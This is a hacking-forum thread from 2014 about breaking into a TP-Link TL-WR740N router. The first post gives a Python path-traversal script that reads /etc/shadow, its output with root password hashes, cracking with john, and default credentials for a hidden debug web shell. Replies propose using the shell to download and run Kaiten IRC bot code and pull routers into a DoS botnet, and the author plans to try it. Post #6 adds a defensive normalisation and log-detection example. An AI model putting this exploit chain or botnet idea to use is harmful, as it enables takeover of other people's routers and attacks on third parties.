

Hacking into TP-Link (TL-WR740N)
Hacking into TP-Link (TL-WR740N) #1
Hello
(dedicated to @"chmod")

Yes it's me again!

Ok, this is a story and not a tutorial or a project... also this is not a 0-day. I just found out that it is a very well-known vulnerability in TP-Link routers, but the implementation is what I want to show you, plus the story.

Lately I was hacking/pentesting routers (TP-Link, ZTE and BandLuxe), and I found lots of interesting stuff that I will post all in the forum as soon as possible, but to start with here is one!

I have a TL-WR740N router (it is an old one) whose firmware I was trying to gain access to, which I think is OpenWRT, but nmap reports that it is a TP-Link WAP... so idk! I scanned the ports hoping to find an open Telnet or SSH port (the ZTE router has the TELNET port open, by the way!!!) but they are not open. Here is my primary scan:

Code:
ligeti-Studio-1558 ~ # nmap -sT 192.168.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 00:38 EEST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.0028s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
80/tcp   open  http
1900/tcp open  upnp
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.59 seconds

SO ... I went to test the graphical interface (the web interface of the router on http://192.168.0.1/). Here is how the page looks:

[Image: rXMCVfg.png]

A little about the interface, I checked the source code and found out that the webpage uses <frame> tags to load the site content.

Here is the source code:
Code:
<FRAMESET cols=160,55%,*>
<FRAMESET rows=72,* frameSpacing=0 frameBorder=0>
<FRAME name=productphoto marginWidth=0 marginHeight=0 src="/images/productphoto.gif" noResize scrolling=no>
<FRAME name=bottomLeftFrame marginWidth=0 marginHeight=0 src="/userRpm/MenuRpm.htm" noResize>
        </FRAMESET>
    <FRAME name=mainFrame marginWidth=0 marginHeight=0 src="/userRpm/StatusRpm.htm" frameBorder=0>
    <FRAME name=helpFrame marginWidth=0 marginHeight=0 src="/help/StatusHelpRpm.htm" frameBorder=1>
    </FRAMESET>

I thought to test the website for XSS first, but I didn't think that it would be easy (but not impossible, and still an option of course), so... what to do? First I did some very basic checks and tested the web server against directory traversal, and here is how I did it:
Something to notice here: urllib, which I used to download the html pages, will return an error "IOError: ('http protocol error', 0, 'got a bad status line', None)" and exit if the target url is not... an html file (I think). I really don't care about this issue as I personally don't use urllib anymore (I switched to mechanize a while ago) but... anyway (this is just a notice)!

My full script:
Code:
import urllib
import time

# How many directories do we want to go back (depth of the test)
depth = 10

host = 'http://192.168.0.1/'
path = '../'
target = 'etc/shadow'

fullpath = ''

# List of directories I want to test
directories = ['', 'frames/', 'images/', 'help/']

for i in range(1, depth):
    fullpath += path
    for directory in directories:
        url = host + directory + fullpath + target
        print "Testing: ", url
        # Reset per request, otherwise a hit from an earlier URL is reported again
        htmltext = ''
        try:
            htmltext = urllib.urlopen(url).read()
        except IOError:
            # urllib raises "got a bad status line" for non-HTML responses
            pass
        if "root" in htmltext:
            print url, " is vulnerable"
        else:
            time.sleep(2)

The program (more precisely urllib) will prompt for a user/password. The default username and password for the TL-WR740N router is admin/admin (if not, I could just use hydra or medusa to crack the password!)

The output:
Code:
Testing:  http://192.168.0.1/../etc/shadow
Testing:  http://192.168.0.1/frames/../etc/shadow
Enter username for TP-LINK Wireless Lite N Router WR740N at 192.168.0.1: admin
Enter password for admin in TP-LINK Wireless Lite N Router WR740N at 192.168.0.1:
Testing:  http://192.168.0.1/images/../etc/shadow
Testing:  http://192.168.0.1/help/../etc/shadow
Testing:  http://192.168.0.1/../../etc/shadow
Testing:  http://192.168.0.1/frames/../../etc/shadow
http://192.168.0.1/frames/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/images/../../etc/shadow
http://192.168.0.1/images/../../etc/shadow  is vulnerable
Testing:  http://192.168.0.1/help/../../etc/shadow
http://192.168.0.1/help/../../etc/shadow  is vulnerable

So ... if you run this script with the -i option (python -i <script.py>) you will end up in interactive mode (good for debugging), so I checked the value of htmltext and what do you know Smile

Code:
>>> print htmltext
<HTML>
<HEAD><TITLE>TL-WR740N</TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript"><!--
if(window.parent == window){window.location.href="http://192.168.0.1";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//--></SCRIPT>
root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
bin::10933:0:99999:7:::
daemon::10933:0:99999:7:::
adm::10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody::10933:0:99999:7:::
ap71::10933:0:99999:7:::

Not bad so far! So now what?

I copied the line that has the root account in it to a file named root.password, and using john:
Code:
john --show root.password


I got the password, it is 5up (default password I guess)

Anyway... now what? (this is interesting)

Well... I did my research, and this is what I found:

TP-Link routers have a hidden web shell that you can access using this url:
http://192.168.0.1/userRpmNatDebugRpm265...dline.html

The user name is osteam and the password is 5up. Here is how this interface looks:
[Image: U7DgXcp.png]

And there is actually an nmap script to test this vulnerability in TP-Link routers
Code:
nmap -p80 --script http-tplink-dir-traversal -Pn -n 192.168.0.1

Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-19 02:33 EEST
Nmap scan report for 192.168.0.1
Host is up (0.00016s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-tplink-dir-traversal:
|   VULNERABLE:
|   Path traversal vulnerability in several TP-Link wireless routers
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some TP-Link wireless routers are vulnerable to a path traversal vulnerability that allows attackers to read configurations or any other file in the device.
|       This vulnerability can be exploited without authenticatication.
|       Confirmed vulnerable models: WR740N, WR740ND, WR2543ND
|       Possibly vulnerable (Based on the same firmware): WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,MR3220,MR3020,WR841N.
|     Disclosure date: 2012-06-18
|     Extra information:
|       /etc/shadow :
|  
|   root:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   Admin:$1$$zdlNHiCDxYDfeF4MZL.H3/:10933:0:99999:7:::
|   bin::10933:0:99999:7:::
|   daemon::10933:0:99999:7:::
|   adm::10933:0:99999:7:::
|   lp:*:10933:0:99999:7:::
|   sync:*:10933:0:99999:7:::
|   shutdown:*:10933:0:99999:7:::
|   halt:*:10933:0:99999:7:::
|   uucp:*:10933:0:99999:7:::
|   operator:*:10933:0:99999:7:::
|   nobody::10933:0:99999:7:::
|   ap71::10933:0:99999:7:::
|  
|     References:
|_      http://websec.ca/advisories/view/path-traversal-vulnerability-tplink-wdr740
MAC Address: 00:27:19:FD:4E:2A (Tp-link Technologies CO.)

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

By the way... I mirrored the website using webhttrack (httrack) but I didn't get anything interesting... but when using the web shell, I went to the web directory and there is a folder named "userRpm" and there I found lots of interesting files. I am still digging into this router (I want to see if I can upload a file or add new commands maybe!)

Anyway...

Conclusion

TL-WR740N routers are common here where I live (and in Mexico as well), and they are not secured ... in fact you should be careful with the router you are using and double check and test it for security.

[note]: this is a VERY interesting video about hacking routers (I applied that method on a ZTE router and got great results)



Thanks

RE: Hacking TP-Link (TL-WR740N) #2
Damn you Ligeti I was just about to go to sleep!

Subscribed for the morning had a quick skim through and looks interesting so far.
If you need help feel free to PM me

RE: Hacking TP-Link (TL-WR740N) #3
What is the top speed of those routers? You could use them in a botnet. :p


RE: Hacking TP-Link (TL-WR740N) #4
(06-19-2014, 01:30 AM)chmod Wrote: Damn you Ligeti I was just about to go to sleep!

Subscribed for the morning had a quick skim through and looks interesting so far.

lol, sorry about that, it is 3:32 am here by the way!

We'll talk tomorrow then Smile

Thanks

(06-19-2014, 01:32 AM)Kaiten Wrote: What is the top speed of those routers? You could use them in a botnet. :p

I have no idea ... I think 150Mbps, they are not bad if configured correctly.

Use them in a botnet? please explain Smile

RE: Hacking TP-Link (TL-WR740N) #5
I actually use this router at my house. Visiting with my family for a while, but when I get home I'm definitely going to test this.

Bookmarked for now, & thank you for pointing out an exploit in the router I'm using!

Great walk-through, too. Very informational & impressive. Smile


RE: Hacking TP-Link (TL-WR740N) #6
It's actually part of the spec to remove such (/../). However, unlike a file system these dot-segments are only interpreted within the URI path hierarchy and are removed as part of the resolution process.
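The dot-segment resolution that post #6 refers to, and the `../` probes from the first post, worked through as an added example that is not from this thread, from TP-Link, or from the nmap script: a Python 3 implementation of RFC 3986 section 5.2.4 that also reports when a request tried to climb above the root. The same routine is used once on the mitigation side (map a request onto a web root only after resolution) and once on the detection side (flag such requests in an access log). The web root `/www`, the Common Log Format, the client addresses and the log lines are all assumptions constructed for the example.

```python
# Added example (not from this thread): RFC 3986 dot-segment removal, used
# both to refuse requests that climb out of the web root and to flag such
# requests in an access log. Sample log lines below are constructed.
import re
from urllib.parse import unquote


def remove_dot_segments(path):
    """Apply RFC 3986 section 5.2.4 to an absolute URI path.

    Returns (normalized_path, escaped). `escaped` is True when a '..'
    segment tried to climb above the root. A file handler that simply
    concatenates the raw path onto its web root never reaches this point
    and hands the filesystem a real '..' instead.
    """
    segments = path.split('/')
    if path.startswith('/'):
        segments = segments[1:]          # drop the empty segment before the first '/'
    stack = []
    escaped = False
    for seg in segments:
        if seg == '.':
            continue
        if seg == '..':
            if stack:
                stack.pop()
            else:
                escaped = True           # nothing left to pop: request left the root
            continue
        stack.append(seg)
    if segments and segments[-1] in ('.', '..'):
        stack.append('')                 # RFC: a trailing '.' or '..' leaves a trailing '/'
    return '/' + '/'.join(stack), escaped


def resolve_under_root(web_root, request_target):
    """Mitigation side: map a request target onto the web root only after
    dot-segment removal, returning None for anything that escaped."""
    path = unquote(request_target.split('?', 1)[0])   # single decode, drop the query
    normalized, escaped = remove_dot_segments(path)
    if escaped:
        return None
    return web_root.rstrip('/') + normalized


# Common Log Format: client ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample lines; the client IP, timestamps and sizes are made up.
SAMPLE_LOG = [
    '192.168.0.100 - - [19/Jun/2014:00:40:01 +0300] "GET /userRpm/StatusRpm.htm HTTP/1.1" 200 3120',
    '192.168.0.100 - - [19/Jun/2014:00:40:05 +0300] "GET /frames/../../etc/shadow HTTP/1.1" 200 812',
    '192.168.0.100 - - [19/Jun/2014:00:40:09 +0300] "GET /images/%2e%2e/%2e%2e/etc/passwd HTTP/1.1" 200 640',
    '192.168.0.100 - - [19/Jun/2014:00:40:12 +0300] "GET /help/../StatusHelpRpm.htm HTTP/1.1" 200 2210',
]


def traversal_attempts(log_lines):
    """Detection side: return (client, raw_target, resolved_path, status) for
    every request whose path escaped the root after decoding and resolution.
    A '..' that stays inside the root (last sample line) is not reported."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        decoded = unquote(target.split('?', 1)[0])
        normalized, escaped = remove_dot_segments(decoded)
        if escaped:
            hits.append((client, target, normalized, int(status)))
    return hits


if __name__ == '__main__':
    for client, target, resolved, status in traversal_attempts(SAMPLE_LOG):
        print(f'{client} requested {target} -> {resolved} (status {status})')
    print(resolve_under_root('/www', '/frames/../../etc/shadow'))   # None
```

Two caveats on the detection side: the log check decodes the target exactly once, so a double-encoded `%252e%252e` would only be caught if the server is known to decode twice, and it treats only `/` as a separator, which is right for a URI path but not for a handler that also accepts backslashes. A 200 status on a request that resolved above the root, as in the thread's output, is the signal worth alerting on; a 404 on the same path means the server refused it.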


RE: Hacking TP-Link (TL-WR740N) #7
Thank you my brother (Ligeti), you're a very clever MAN


RE: Hacking TP-Link (TL-WR740N) #8
(06-19-2014, 01:34 AM)Ligeti Wrote:
(06-19-2014, 01:30 AM)chmod Wrote: Damn you Ligeti I was just about to go to sleep!

Subscribed for the morning had a quick skim through and looks interesting so far.

lol, sorry about that, it is 3:32 am here by the way!

We'll talk tomorrow then Smile

Thanks

(06-19-2014, 01:32 AM)Kaiten Wrote: What is the top speed of those routers? You could use them in a botnet. :p

I have no idea ... I think 150Mbps, they are not bad if configured correctly.

Use them in a botnet? please explain Smile

Well since they have a web shell, they are most likely running some sort of *nix.
So if you had a botnet, for example Kaiten IRC, you would be able to download your file (Kaiten.c) and execute the file.
Which would then link that system(The router.) To your botnet, which would allow you to remotely execute commands from the IRC, such as DoS attacks.


RE: Hacking TP-Link (TL-WR740N) #9
(06-19-2014, 08:06 PM)Kaiten Wrote: Well since they have a web shell, they are most likely running some sort of *nix.
So if you had a botnet, for example Kaiten IRC, you would be able to download your file (Kaiten.c) and execute the file.
Which would then link that system(The router.) To your botnet, which would allow you to remotely execute commands from the IRC, such as DoS attacks.

Good idea... I should test that one day soon! Smile

Thanks

RE: Hacking TP-Link (TL-WR740N) #10
(06-19-2014, 08:13 PM)Ligeti Wrote:
(06-19-2014, 08:06 PM)Kaiten Wrote: Well since they have a web shell, they are most likely running some sort of *nix.
So if you had a botnet, for example Kaiten IRC, you would be able to download your file (Kaiten.c) and execute the file.
Which would then link that system(The router.) To your botnet, which would allow you to remotely execute commands from the IRC, such as DoS attacks.

Good idea... I should test that one day soon! Smile

Thanks

No problem, and good luck!







